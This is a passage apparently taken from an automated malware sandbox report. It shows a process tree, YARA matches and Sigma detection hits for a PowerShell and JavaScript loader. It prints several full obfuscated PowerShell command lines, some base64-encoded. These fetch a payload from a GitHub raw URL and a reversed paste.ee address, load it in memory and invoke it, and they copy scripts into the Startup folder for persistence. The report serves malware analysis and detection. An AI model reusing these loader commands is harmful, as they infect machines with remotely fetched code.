        • powershell.exe (PID: 8824 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $eNv:cOMSPEc[4,15,25]-JoIN'')( (('{2}url = {0'+'}htt'+'ps://raw.'+'gith'+'u'+'buser'+'cont'+'ent.co'+'m/N'+'oDetec'+'tO'+'n/NoDe'+'tectOn/'+'r'+'e'+'f'+'s/'+'he'+'ads/main/D'+'et'+'ahNote_J.txt'+'{0}'+'; '+'{'+'2}bas'+'e64Co'+'n'+'ten'+'t = (New-Object'+' S'+'yst'+'em'+'.Net'+'.W'+'e'+'b'+'Clie'+'n'+'t'+').'+'D'+'ownlo'+'a'+'dSt'+'r'+'i'+'ng'+'({'+'2}url); '+'{2}bi'+'na'+'ryCon'+'tent = [S'+'ystem.'+'Conver'+'t]:'+':Fr'+'o'+'mBase64String({2}ba'+'se64'+'C'+'ont'+'ent)'+';'+' {2}'+'asse'+'m'+'b'+'ly '+'= [Ref'+'le'+'c'+'ti'+'on.Assemb'+'ly]::L'+'oa'+'d'+'({'+'2}bina'+'ry'+'C'+'ontent); {2}'+'c'+'omma'+'n'+'d ='+' {0}['+'dnlib.'+'IO.Home]::'+'V'+'AI('+'{'+'3'+'}0/'+'K'+'SAc'+'F'+'/d'+'/ee.'+'et'+'s'+'a'+'p//:spt'+'th'+'{3}'+', {3}1'+'{3}'+', {3'+'}'+'C:'+'{'+'1'+'}Pro'+'gr'+'amD'+'a'+'t'+'a{1'+'}{'+'3}, {'+'3'+'}'+'ra'+'jado'+'{3'+'}, '+'{3}Ad'+'d'+'InP'+'rocess32{3},'+' {3'+'}'+'d'+'es'+'at'+'ivado{3},'+'{3}'+'{3})'+'{'+'0}'+';'+' I'+'nvok'+'e-Ex'+'p'+'ression {2'+'}com'+'m'+'an'+'d') -F [cHar]39,[cHar]92,[cHar]36,[cHar]34) )" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cmd.exe (PID: 1524 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_2x_bee.js.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 4268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • wscript.exe (PID: 6556 cmdline: wscript.exe "C:\Users\Public\Documents\2x_bee.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • cmd.exe (PID: 8252 cmdline: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')') MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • PING.EXE (PID: 8296 cmdline: ping 127.0.0.1 -n 10 MD5: 2F46799D79D22AC72C241EC0322B011D)
        • powershell.exe (PID: 8472 cmdline: powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')') MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 9064 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 9072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 9176 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s; CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent = '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks; Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe 'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • wscript.exe (PID: 8432 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 8628 cmdline: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')') MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 8672 cmdline: ping 127.0.0.1 -n 10 MD5: 2F46799D79D22AC72C241EC0322B011D)
      • powershell.exe (PID: 8948 cmdline: powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')') MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 2968 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3668 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s; CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent = '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks; Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe 'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 8000INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x24248a:$b2: ::FromBase64String(
  • 0x243aa5:$b2: ::FromBase64String(
  • 0x413c:$s1: -JoIN
  • 0x45ca:$s1: -JoIN
  • 0x4c67:$s1: -JoIN
  • 0x52b0:$s1: -JoIN
  • 0x6d78:$s1: -join
  • 0x1473b:$s1: -join
  • 0x16300:$s1: -join
  • 0x1648c:$s1: -join
  • 0x1a865:$s1: -join
  • 0x1f646:$s1: -JoIN
  • 0x1facd:$s1: -JoIN
  • 0x37b33:$s1: -JoIN
  • 0x3c071:$s1: -JoIN
  • 0x3dd96:$s1: -JoIN
  • 0x3e366:$s1: -JoIN
  • 0x485ec:$s1: -JoIN
  • 0x50b0a:$s1: -JoIN
  • 0x5ddec:$s1: -JoIN
  • 0x6aa94:$s1: -join
Process Memory Space: powershell.exe PID: 1784INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x147534:$b2: ::FromBase64String(
  • 0x1486f0:$b2: ::FromBase64String(
  • 0x1488bc:$b2: ::FromBase64String(
  • 0x18274:$s1: -join
  • 0x189d5:$s1: -join
  • 0x473ac:$s1: -join
  • 0x54eb2:$s1: -join
  • 0x56ab3:$s1: -join
  • 0x56c3f:$s1: -join
  • 0x5b025:$s1: -join
  • 0x9bd0c:$s1: -join
  • 0xb9087:$s1: -join
  • 0xc615c:$s1: -join
  • 0xc952e:$s1: -join
  • 0xc9be0:$s1: -join
  • 0xcb6d1:$s1: -join
  • 0xcd8d7:$s1: -join
  • 0xce0fe:$s1: -join
  • 0xce96e:$s1: -join
  • 0xcf0a9:$s1: -join
  • 0xcf0db:$s1: -join
Process Memory Space: powershell.exe PID: 8824INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x45a56:$b2: ::FromBase64String(
  • 0x47001:$b2: ::FromBase64String(
  • 0x1cd:$s1: -join
  • 0x657:$s1: -join
  • 0x5daf:$s1: -JoIN
  • 0x6236:$s1: -JoIN
  • 0x6f0d:$s1: -JoIN
  • 0x1e3d0:$s1: -join
  • 0x20b33:$s1: -join
  • 0x5e12f:$s1: -join
  • 0x5e16a:$s1: -join
  • 0x5e224:$s1: -join
  • 0x5e252:$s1: -join
  • 0x5e3fd:$s1: -join
  • 0x5e420:$s1: -join
  • 0x5e6d3:$s1: -join
  • 0x5e6f4:$s1: -join
  • 0x5e726:$s1: -join
  • 0x5e76e:$s1: -join
  • 0x5e79b:$s1: -join
  • 0x5e7c2:$s1: -join
SourceRuleDescriptionAuthorStrings
amsi64_8000.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security
    amsi64_1784.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security
      amsi64_8824.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security
        amsi64_9176.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security
          amsi64_3668.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAoACAAJABlAE4AdgA6AGMATwBNAFMAUABFAGMAWwA0ACwAMQA1ACwAMgA1AF0ALQBKAG8ASQBOACcAJwApACgAIAAoACgAJwB7ADIAfQB1AHIAbAAgAD0AIAB7ADAAJwArACcAfQBoAHQAdAAnACsAJwBwAHMAOgAvAC8AcgBhAHcALgAnACsAJwBnAGkAdABoACcAKwAnAHUAJwArACcAYgB1AHMAZQByACcAKwAnAGMAbwBuAHQAJwArACcAZQBuAHQALgBjAG8AJwArACcAbQAvAE4AJwArACcAbwBEAGUAdABlAGMAJwArACcAdABPACcAKwAnAG4ALwBOAG8ARABlACcAKwAnAHQAZQBjAHQATwBuAC8AJwArACcAcgAnACsAJwBlACcAKwAnAGYAJwArACcAcwAvACcAKwAnAGgAZQAnACsAJwBhAGQAcwAvAG0AYQBpAG4ALwBEACcAKwAnAGUAdAAnACsAJwBhAGgATgBvAHQAZQBfAEoALgB0AHgAdAAnACsAJwB7ADAAfQAnACsAJwA7ACAAJwArACcAewAnACsAJwAyAH0AYgBhAHMAJwArACcAZQA2ADQAQwBvACcAKwAnAG4AJwArACcAdABlAG4AJwArACcAdAAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAJwArACcAIABTACcAKwAnAHkAcwB0ACcAKwAnAGUAbQAnACsAJwAuAE4AZQB0ACcAKwAnAC4AVwAnACsAJwBlACcAKwAnAGIAJwArACcAQwBsAGkAZQAnACsAJwBuACcAKwAnAHQAJwArACcAKQAuACcAKwAnAEQAJwArACcAbwB3AG4AbABvACcAKwAnAGEAJwArACcAZABTAHQAJwArACcAcgAnACsAJwBpACcAKwAnAG4AZwAnACsAJwAoAHsAJwArACcAMgB9AHUAcgBsACkAOwAgACcAKwAnAHsAMgB9AGIAaQAnACsAJwBuAGEAJwArACcAcgB5AEMAbwBuACcAKwAnAHQAZQBuAHQAIAA9ACAAWwBTACcAKwAnAHkAcwB0AGUAbQAuACcAKwAnAEMAbwBuAHYAZQByACcAKwAnAHQAXQA6ACcAKwAnADoARgByACcAKwAnAG8AJwArACcAbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAHsAMgB9AGIAYQAnACsAJwBzAGUANgA0ACcAKwAnAEMAJwArACcAbwBuAHQAJwArACcAZQBuAHQAKQAnACsAJwA7ACcAKwAnACAAewAyAH0AJwArACcAYQBzAHMAZQAnACsAJwBtACcAKwAnAGIAJwArACcAbAB5ACAAJwArACcAPQAgAFsAUgBlAGYAJwArACcAbABlACcAKwAnAGMAJwArACcAdABpACcAKwAnAG8AbgAuAEEAcwBzAGUAbQBiACcAKwAnAGwAeQBdADoAOgBMACcAKwAnAG8AYQAnACsAJwBkACcAKwAnACgAewAnACsAJwAyAH0AYgBpAG4AYQAnACsAJwByAHkAJwArACcAQwAnACsAJwBvAG4AdABlAG4AdAApADsAIAB7ADIAfQAnACsAJwBjACcAKwAnAG8AbQBtAGEAJwArACcAbgAnACsAJwBkACAAPQAnACsAJwAgAHsAMAB9AFsAJwArACcAZABuAGwAaQBiAC4AJwArACcASQBPAC4ASABvAG0AZQBdADoAOgAnACsAJwBWACcAKwAnAEEASQAoACcAKwAnAHsAJwArACcAMwAnACsAJwB9ADAALwAnACsAJwBLACcAKwAnAFMAQQBjACcAKwAnAEYAJwArACcALwBkACcAKwAnAC8AZQBlAC4AJwArACcAZQB0ACcAKwAnAHMAJwArACcAYQAnACsAJwBwAC8ALwA6AHMAcAB0ACcAKwAnAHQAaAAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzAH0AMQAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzACcAKwAnAH0AJwArACcAQwA6ACcAKwAnAHsAJwArACcAMQAnACsAJwB9AFAAcgBvACcAKwAnAGcAcgAnACsAJwBhAG0ARAAnACsAJwBhACcAKwAnAHQAJwArACcAYQB7ADEAJwArACcAfQB7ACcAKwAnADMAfQAsACAAewAnACsAJwAzACcAKwAnAH0AJwArACcAcgBhACcAKwAnAGoAYQBkAG8AJwArACcAewAzACcAKwAnAH0ALAAgACcAKwAnAHsAMwB9AEEAZAAnACsAJwBkACcAKwAnAEkAbgBQACcAKwAnAHIAbwBjAGUAcwBzADMAMgB7ADMAfQAsACcAKwAnACAAewAzACcAKwAnAH0AJwArACcAZAAnACsAJwBlAHMAJwArACcAYQB0ACcAKwAnAGkAdgBhAGQAbwB7ADMAfQAsACcAKwAnAHsAMwB9ACcAKwAnAHsAMwB9ACkAJwArACcAewAnACsAJwAwAH0AJwArACcAOwAnACsAJwAgAEkAJwArACcAbgB2AG8AawAnACsAJwBlAC0ARQB4ACcAKwAnAHAAJwArACcAcgBlAHMAcwBpAG8AbgAgAHsAMgAnACsAJwB9AGMAbwBtACcAKwAnAG0AJwArACcAYQBuACcAKwAnAGQAJwApACAALQBGACAAWwBjAEgAYQByAF0AMwA5ACwAWwBjAEgAYQByAF0AOQAyACwAWwBjAEgAYQByAF0AMwA2ACwAWwBjAEgAYQByAF0AMwA0ACkAIAApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -window
            Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $eNv:cOMSPEc[4,15,25]-JoIN'')( (('{2}url = {0'+'}htt'+'ps://raw.'+'gith'+'u'+'buser'+'cont'+'ent.co'+'m/N'+'oDetec'+'tO'+'n/NoDe'+'tectOn/'+'r'+'e'+'f'+'s/'+'he'+'ads/main/D'+'et'+'ahNote_J.txt'+'{0}'+'; '+'{'+'2}bas'+'e64Co'+'n'+'ten'+'t = (New-Object'+' S'+'yst'+'em'+'.Net'+'.W'+'e'+'b'+'Clie'+'n'+'t'+').'+'D'+'ownlo'+'a'+'dSt'+'r'+'i'+'ng'+'({'+'2}url); '+'{2}bi'+'na'+'ryCon'+'tent = [S'+'ystem.'+'Conver'+'t]:'+':Fr'+'o'+'mBase64String({2}ba'+'se64'+'C'+'ont'+'ent)'+';'+' {2}'+'asse'+'m'+'b'+'ly '+'= [Ref'+'le'+'c'+'ti'+'on.Assemb'+'ly]::L'+'oa'+'d'+'({'+'2}bina'+'ry'+'C'+'ontent); {2}'+'c'+'omma'+'n'+'d ='+' {0}['+'dnlib.'+'IO.Home]::'+'V'+'AI('+'{'+'3'+'}0/'+'K'+'SAc'+'F'+'/d'+'/ee.'+'et'+'s'+'a'+'p//:spt'+'th'+'{3}'+', {3}1'+'{3}'+', {3'+'}'+'C:'+'{'+'1'+'}Pro'+'gr'+'amD'+'a'+'t'+'a{1'+'}{'+'3}, {'+'3'+'}'+'ra'+'jado'+'{3'+'}, '+'{3}Ad'+'d'+'InP'+'rocess32{3},'+' {3'+'}'+'d'+'es'+'at'+'ivado{3},'+'{3}'+'{3})'+'{'+'0}'+';'+' I'+'nvok'+'e-Ex'+'p'+'ression {2'+'}com'+'m'+'an'+'d') -F [cHar]39,[cHar]92,[cHar]36,[cHar]34) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $eNv:cOMSPEc[4,15,25]-JoIN'')( (('{2}url = 